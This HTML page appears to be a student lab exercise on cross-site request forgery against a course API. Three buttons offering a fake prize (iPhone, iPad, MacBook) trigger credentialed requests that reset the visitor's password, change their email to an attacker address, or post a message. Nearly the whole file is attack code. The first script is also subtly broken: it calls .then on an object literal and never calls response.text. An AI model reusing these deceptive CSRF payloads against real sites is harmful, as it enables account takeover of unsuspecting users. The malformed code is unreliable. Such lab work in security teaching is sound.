<!DOCTYPE html>
<html lang='en'>
<head>
    <meta charset='UTF-8'>
    <meta name='viewport' content='width=device-width, initial-scale=1.0'>
    <meta http-equiv='X-UA-Compatible' content='ie=edge'>
    <title>09 CSRF Attacken</title>
</head>
<form>
    <input type='button' id='changePasswordBtn' value='Klicken sie hier um ein IPhone zu gewinnen'>
</form><br /><br />
<script>
    //Aufgabe 1
    var changePassword = document.getElementById('changePasswordBtn');    
    changePassword.addEventListener('click', async (event) => {
        event.preventDefault();
        var changePasswordData = new FormData();
        changePasswordData.append('username', await fetch('https://m183.gibz-informatik.ch/api/csrf/getUsername', {
            credentials: 'include'
        }.then(response => response.text)));
        changePasswordData.append('password', 'Pa$$w0rd');
        await fetch('https://m183.gibz-informatik.ch/api/csrf/changePassword', {
            method: 'POST',
            credentials: 'include',
            body: changePasswordData,
            mode: 'cors'
        }).then(response => response.status + response.statusText);
    });
</script>
<form>
    <input type='button' id='changeEmailBtn' value='Klicken sie hier um ein IPad zu gewinnen'>
</form><br /><br />
<script>
    //Aufgabe 2
    var changeEmail = document.getElementById('changeEmailBtn');    
    changeEmail.addEventListener('click', async (event) => {
        event.preventDefault();    
        await fetch('https://m183.gibz-informatik.ch/api/csrf/changeEmail', {
            method: 'POST',
            credentials: 'include',
            headers: {
                'content-type': 'application/json'
            },
            body: JSON.stringify({
                email: 'pawnd@gibz.ch'
            }),
            mode: 'cors'
        }).then(response => response.status + response.statusText);
    });
</script>
<form>
    <input type='button' id='postMessageBtn' value='Klicken sie hier um ein MacBook zu gewinnen'>
</form>
<script>
    //Aufgabe 3
    var postMessage = document.getElementById('postMessageBtn');    
    postMessage.addEventListener('click', async (event) => {
            event.preventDefault();    
            await fetch('https://m183.gibz-informatik.ch/api/csrf/postMessage', {
                method: 'POST',
                credentials: 'include',
                headers: {
                    'content-type': 'application/json'
                },
                body: JSON.stringify({
                    message: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
                }),
                mode: 'cors'
            }).then(response => response.status + response.statusText);
        });
</script>
</body>
</html>
